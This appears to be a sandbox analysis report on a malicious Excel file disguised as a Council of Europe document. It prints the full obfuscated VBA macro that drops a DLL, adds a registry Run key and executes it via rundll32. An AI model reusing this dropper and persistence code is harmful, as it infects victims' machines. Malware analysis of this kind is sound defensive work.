VTI SCORE: 95/100
Dynamic Analysis Report |
Classification: |
Keylogger
Dropper
|
Threat Names: | - |
Council-of-Europe-.xls
Excel Document
Created at 2020-04-08T20:44:00
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
Filename | Category | Type | Severity | Actions |
---|
C:\Users\aETAdzjz\Desktop\Council-of-Europe-.xls | Sample File | Excel Document |
Malicious
|
...
|
»
Office Information
»
Create Time | 2015-06-05 18:17:20+00:00 |
Modify Time | 2020-04-07 07:54:22+00:00 |
Document Information
»
Codepage | ANSI_Latin1 |
Application | Microsoft Excel |
App Version | 15.0 |
Document Security | NONE |
Titles Of Parts | Sheet1, Sheet2 |
scale_crop | False |
shared_doc | False |
Controls (1)
»
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020820-0000-0000-C000-000000000046} | Excel97Sheet | - |
VBA Macros (2)
»
Macro #1: Module1
»
Attribute VB_Name = "Module1"
Sub sa()
End Sub
Macro #2: ThisWorkbook
»
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function SZpmrPBsT(h)
Dim a: a = Split(h)
Dim i
For i = 0 To UBound(a)
a(i) = Chr("&H" & a(i))
Next
h2s = Join(a, "")
SZpmrPBsT = h2s
End Function
Sub Workbook_Open()
mykk = "qnZeVsoOpmeN"
Dim g
d = "MsgBox ('Invalid User and Passwdord')"
Dim AC
For i = 1 To 70
Celles = "A" + CStr(i)
A1 = ThisWorkbook.Sheets("Sheet2").Range(Celles).Value
If A1 = "" Then
Exit For
End If
AC = AC + A1
Next i
Dim o
d = "MsgBox ('Please login')"
Set Ofile = CreateObject("Scripting.FileSystemObject")
o = xoAOvMNPSVo(mykk, AC)
Dim dd
dd = SZpmrPBsT("43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c")
lkd = hMqirSfTAmm(o)
Set WText = Ofile.CreateTextFile(dd)
WText.WriteLine Left(lkd, Len(lkd) - 1)
WText.Close
Dim func
func = SZpmrPBsT("43 41 4c 4c")
Dim lib
lib = SZpmrPBsT("4b 65 72 6e 65 6c 33 32")
Dim ok
ok = SZpmrPBsT("57 69 6e 45 78 65 63")
Dim go
Dim goo
goo = SZpmrPBsT("52 45 47 20 41 44 44 20 48 4b 43 55 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 52 75 6e 20 2f 76 20 41 75 74 6f 53 74 61 72 74 20 2f 74 20 52 45 47 5f 53 5a 20 2f 64 20 22 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74 22")
Set WText = Ofile.CreateTextFile(SZpmrPBsT("43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74"))
WText.WriteLine goo
WText.Close
Dim lets
lets = SZpmrPBsT("63 6d 64 2e 65 78 65 20 2f 63 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74")
Application.ExecuteExcel4Macro Replace(Replace(Replace(Replace("{{}}(""[]"", ""{^}"", ""JCCJ"", ""[*]"", 0)", "{{}}", func), "[]", lib), "{^}", ok), "[*]", lets)
go = SZpmrPBsT("70 6f 77 65 72 73 68 65 6c 6c 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74")
Application.ExecuteExcel4Macro Replace(Replace(Replace(Replace("{{}}(""[]"", ""{^}"", ""JCCJ"", ""[*]"", 0)", "{{}}", func), "[]", lib), "{^}", ok), "[*]", go)
d = "MsgBox ('This is a valid password.')"
End Sub
Function xoAOvMNPSVo(yy, msg)
Dim outre
Dim intCoun
a = Split(msg, ",")
msg_len = UBound(a)
Dim x
For x = 0 To msg_len
key_a = Mid(yy, intCoun + 1, 1)
If intCoun = Len(yy) Then
intCoun = 0
key_a = Mid(yy, intCoun + 1, 1)
End If
intCoun = intCoun + 1
Dim ll
ll = CInt("&H" & Replace(a(x), "0x", ""))
fg = ll - (Asc(key_a) + 256) Mod 256
gdd_a = Chr(fg)
outre = outre + gdd_a
Next
xoAOvMNPSVo = outre
End Function
Function hMqirSfTAmm(ss)
brt = SZpmrPBsT("41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f")
Dim stringlen, resOut, grpBegin
stringlen = Len(ss) - 1
newstring = Left(ss, stringlen)
For grpBegin = 1 To stringlen Step 4
Dim numDataBytes, CharCounter, Oo, Pp, nGcount, pOut
numDataBytes = 3
nGcount = 0
For CharCounter = 0 To 3
Oo = Mid(newstring, grpBegin + CharCounter, 1)
If Oo = "=" Then
numDataBytes = numDataBytes - 1
Pp = 0
Else
Pp = InStr(1, brt, Oo, vbBinaryCompare) - 1
End If
Dim tr
tr = 64 * nGcount
nGcount = tr + Pp
Next
nGcount = Hex(nGcount)
Dim ds
ds = String(6 - Len(nGcount), "0")
nGcount = ds & nGcount
Dim po
po = CByte("&H" & Mid(nGcount, 1, 2))
pOut = Chr(po)
pOut = pOut + Chr(CByte("&H" & Mid(nGcount, 3, 2)))
pOut = pOut + Chr(CByte("&H" & Mid(nGcount, 5, 2)))
resOut = resOut & Left(pOut, numDataBytes)
Next
hMqirSfTAmm = resOut
End Function
YARA Matches (1)
»
Rule Name | Rule Description | Classification | Score | Actions |
---|---|---|---|---|
VBA_Create_File | VBA macro contains file creation commands; possible dropper | - |
2/5
|
...
|
PE Information
»
Image Base | 0x10000000 |
Entry Point | 0x1000f046 |
Size Of Code | 0x26a00 |
Size Of Initialized Data | 0x14e00 |
File Type | FileType.dll |
Subsystem | Subsystem.windows_cui |
Machine Type | MachineType.i386 |
Compile Timestamp | 2020-04-06 11:07:00+00:00 |
Sections (6)
»
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x10001000 | 0x26813 | 0x26a00 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.62 |
.rdata | 0x10028000 | 0xf3c6 | 0xf400 | 0x26e00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.63 |
.data | 0x10038000 | 0x1d28 | 0xe00 | 0x36200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.72 |
.tls | 0x1003a000 | 0x13a5 | 0x1400 | 0x37000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
.rsrc | 0x1003c000 | 0x1e0 | 0x200 | 0x38400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.72 |
.reloc | 0x1003d000 | 0x24d8 | 0x2600 | 0x38600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.5 |
Imports (6)
»
KERNEL32.dll (82)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CreatePipe | 0x0 | 0x10028018 | 0x36b64 | 0x35964 | 0xda |
PeekNamedPipe | 0x0 | 0x1002801c | 0x36b68 | 0x35968 | 0x413 |
MultiByteToWideChar | 0x0 | 0x10028020 | 0x36b6c | 0x3596c | 0x3e0 |
CloseHandle | 0x0 | 0x10028024 | 0x36b70 | 0x35970 | 0x84 |
CreateProcessW | 0x0 | 0x10028028 | 0x36b74 | 0x35974 | 0xe2 |
WriteFile | 0x0 | 0x1002802c | 0x36b78 | 0x35978 | 0x5fc |
CreateFileW | 0x0 | 0x10028030 | 0x36b7c | 0x3597c | 0xc8 |
WideCharToMultiByte | 0x0 | 0x10028034 | 0x36b80 | 0x35980 | 0x5e8 |
ReadFile | 0x0 | 0x10028038 | 0x36b84 | 0x35984 | 0x463 |
GetComputerNameW | 0x0 | 0x1002803c | 0x36b88 | 0x35988 | 0x1da |
GetVersion | 0x0 | 0x10028040 | 0x36b8c | 0x3598c | 0x30f |
FlushFileBuffers | 0x0 | 0x10028044 | 0x36b90 | 0x35990 | 0x19a |
SetFilePointerEx | 0x0 | 0x10028048 | 0x36b94 | 0x35994 | 0x512 |
GetConsoleMode | 0x0 | 0x1002804c | 0x36b98 | 0x35998 | 0x1f7 |
GetConsoleCP | 0x0 | 0x10028050 | 0x36b9c | 0x3599c | 0x1e5 |
HeapSize | 0x0 | 0x10028054 | 0x36ba0 | 0x359a0 | 0x344 |
SetStdHandle | 0x0 | 0x10028058 | 0x36ba4 | 0x359a4 | 0x539 |
Sleep | 0x0 | 0x1002805c | 0x36ba8 | 0x359a8 | 0x56a |
VirtualAlloc | 0x0 | 0x10028060 | 0x36bac | 0x359ac | 0x5b3 |
FreeEnvironmentStringsW | 0x0 | 0x10028064 | 0x36bb0 | 0x359b0 | 0x1a5 |
GetEnvironmentStringsW | 0x0 | 0x10028068 | 0x36bb4 | 0x359b4 | 0x230 |
GetCommandLineW | 0x0 | 0x1002806c | 0x36bb8 | 0x359b8 | 0x1d2 |
WriteConsoleW | 0x0 | 0x10028070 | 0x36bbc | 0x359bc | 0x5fb |
VirtualFree | 0x0 | 0x10028074 | 0x36bc0 | 0x359c0 | 0x5b6 |
EnterCriticalSection | 0x0 | 0x10028078 | 0x36bc4 | 0x359c4 | 0x12d |
LeaveCriticalSection | 0x0 | 0x1002807c | 0x36bc8 | 0x359c8 | 0x3b0 |
DeleteCriticalSection | 0x0 | 0x10028080 | 0x36bcc | 0x359cc | 0x10c |
EncodePointer | 0x0 | 0x10028084 | 0x36bd0 | 0x359d0 | 0x129 |
DecodePointer | 0x0 | 0x10028088 | 0x36bd4 | 0x359d4 | 0x105 |
SetLastError | 0x0 | 0x1002808c | 0x36bd8 | 0x359d8 | 0x521 |
InitializeCriticalSectionAndSpinCount | 0x0 | 0x10028090 | 0x36bdc | 0x359dc | 0x354 |
CreateEventW | 0x0 | 0x10028094 | 0x36be0 | 0x359e0 | 0xbc |
TlsAlloc | 0x0 | 0x10028098 | 0x36be4 | 0x359e4 | 0x58b |
TlsGetValue | 0x0 | 0x1002809c | 0x36be8 | 0x359e8 | 0x58d |
TlsSetValue | 0x0 | 0x100280a0 | 0x36bec | 0x359ec | 0x58e |
TlsFree | 0x0 | 0x100280a4 | 0x36bf0 | 0x359f0 | 0x58c |
GetSystemTimeAsFileTime | 0x0 | 0x100280a8 | 0x36bf4 | 0x359f4 | 0x2e1 |
GetModuleHandleW | 0x0 | 0x100280ac | 0x36bf8 | 0x359f8 | 0x270 |
GetProcAddress | 0x0 | 0x100280b0 | 0x36bfc | 0x359fc | 0x2a6 |
LCMapStringW | 0x0 | 0x100280b4 | 0x36c00 | 0x35a00 | 0x3a4 |
GetLocaleInfoW | 0x0 | 0x100280b8 | 0x36c04 | 0x35a04 | 0x25d |
GetStringTypeW | 0x0 | 0x100280bc | 0x36c08 | 0x35a08 | 0x2cf |
GetCPInfo | 0x0 | 0x100280c0 | 0x36c0c | 0x35a0c | 0x1bc |
SetEvent | 0x0 | 0x100280c4 | 0x36c10 | 0x35a10 | 0x505 |
ResetEvent | 0x0 | 0x100280c8 | 0x36c14 | 0x35a14 | 0x4b6 |
WaitForSingleObjectEx | 0x0 | 0x100280cc | 0x36c18 | 0x35a18 | 0x5c5 |
UnhandledExceptionFilter | 0x0 | 0x100280d0 | 0x36c1c | 0x35a1c | 0x59a |
SetUnhandledExceptionFilter | 0x0 | 0x100280d4 | 0x36c20 | 0x35a20 | 0x55b |
GetCurrentProcess | 0x0 | 0x100280d8 | 0x36c24 | 0x35a24 | 0x212 |
TerminateProcess | 0x0 | 0x100280dc | 0x36c28 | 0x35a28 | 0x579 |
IsProcessorFeaturePresent | 0x0 | 0x100280e0 | 0x36c2c | 0x35a2c | 0x37b |
IsDebuggerPresent | 0x0 | 0x100280e4 | 0x36c30 | 0x35a30 | 0x374 |
GetStartupInfoW | 0x0 | 0x100280e8 | 0x36c34 | 0x35a34 | 0x2c8 |
QueryPerformanceCounter | 0x0 | 0x100280ec | 0x36c38 | 0x35a38 | 0x43e |
GetCurrentProcessId | 0x0 | 0x100280f0 | 0x36c3c | 0x35a3c | 0x213 |
GetCurrentThreadId | 0x0 | 0x100280f4 | 0x36c40 | 0x35a40 | 0x217 |
InitializeSListHead | 0x0 | 0x100280f8 | 0x36c44 | 0x35a44 | 0x358 |
RtlUnwind | 0x0 | 0x100280fc | 0x36c48 | 0x35a48 | 0x4c2 |
RaiseException | 0x0 | 0x10028100 | 0x36c4c | 0x35a4c | 0x453 |
GetLastError | 0x0 | 0x10028104 | 0x36c50 | 0x35a50 | 0x259 |
FreeLibrary | 0x0 | 0x10028108 | 0x36c54 | 0x35a54 | 0x1a6 |
LoadLibraryExW | 0x0 | 0x1002810c | 0x36c58 | 0x35a58 | 0x3b6 |
InterlockedFlushSList | 0x0 | 0x10028110 | 0x36c5c | 0x35a5c | 0x361 |
HeapAlloc | 0x0 | 0x10028114 | 0x36c60 | 0x35a60 | 0x33b |
HeapReAlloc | 0x0 | 0x10028118 | 0x36c64 | 0x35a64 | 0x342 |
HeapFree | 0x0 | 0x1002811c | 0x36c68 | 0x35a68 | 0x33f |
ExitProcess | 0x0 | 0x10028120 | 0x36c6c | 0x35a6c | 0x159 |
GetModuleHandleExW | 0x0 | 0x10028124 | 0x36c70 | 0x35a70 | 0x26f |
GetModuleFileNameA | 0x0 | 0x10028128 | 0x36c74 | 0x35a74 | 0x26b |
GetACP | 0x0 | 0x1002812c | 0x36c78 | 0x35a78 | 0x1ad |
GetStdHandle | 0x0 | 0x10028130 | 0x36c7c | 0x35a7c | 0x2ca |
GetFileType | 0x0 | 0x10028134 | 0x36c80 | 0x35a80 | 0x247 |
IsValidLocale | 0x0 | 0x10028138 | 0x36c84 | 0x35a84 | 0x382 |
GetUserDefaultLCID | 0x0 | 0x1002813c | 0x36c88 | 0x35a88 | 0x308 |
EnumSystemLocalesW | 0x0 | 0x10028140 | 0x36c8c | 0x35a8c | 0x14f |
GetProcessHeap | 0x0 | 0x10028144 | 0x36c90 | 0x35a90 | 0x2ac |
FindClose | 0x0 | 0x10028148 | 0x36c94 | 0x35a94 | 0x170 |
FindFirstFileExA | 0x0 | 0x1002814c | 0x36c98 | 0x35a98 | 0x175 |
FindNextFileA | 0x0 | 0x10028150 | 0x36c9c | 0x35a9c | 0x185 |
IsValidCodePage | 0x0 | 0x10028154 | 0x36ca0 | 0x35aa0 | 0x380 |
GetOEMCP | 0x0 | 0x10028158 | 0x36ca4 | 0x35aa4 | 0x28f |
GetCommandLineA | 0x0 | 0x1002815c | 0x36ca8 | 0x35aa8 | 0x1d1 |
USER32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
wsprintfW | 0x0 | 0x10028164 | 0x36cb0 | 0x35ab0 | 0x3ac |
ADVAPI32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetUserNameA | 0x0 | 0x10028000 | 0x36b4c | 0x3594c | 0x179 |
bcrypt.dll (7)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
BCryptHashData | 0x0 | 0x1002816c | 0x36cb8 | 0x35ab8 | 0x23 |
BCryptFinishHash | 0x0 | 0x10028170 | 0x36cbc | 0x35abc | 0x1b |
BCryptOpenAlgorithmProvider | 0x0 | 0x10028174 | 0x36cc0 | 0x35ac0 | 0x27 |
BCryptGetProperty | 0x0 | 0x10028178 | 0x36cc4 | 0x35ac4 | 0x21 |
BCryptCreateHash | 0x0 | 0x1002817c | 0x36cc8 | 0x35ac8 | 0x6 |
BCryptCloseAlgorithmProvider | 0x0 | 0x10028180 | 0x36ccc | 0x35acc | 0x2 |
BCryptDestroyHash | 0x0 | 0x10028184 | 0x36cd0 | 0x35ad0 | 0xd |
DNSAPI.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
DnsQuery_A | 0x0 | 0x10028008 | 0x36b54 | 0x35954 | 0x5f |
IPHLPAPI.DLL (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetAdaptersInfo | 0x0 | 0x10028010 | 0x36b5c | 0x3595c | 0x40 |
Exports (1)
»
Api name | EAT Address | Ordinal |
---|---|---|
Start | 0x63b0 | 0x1 |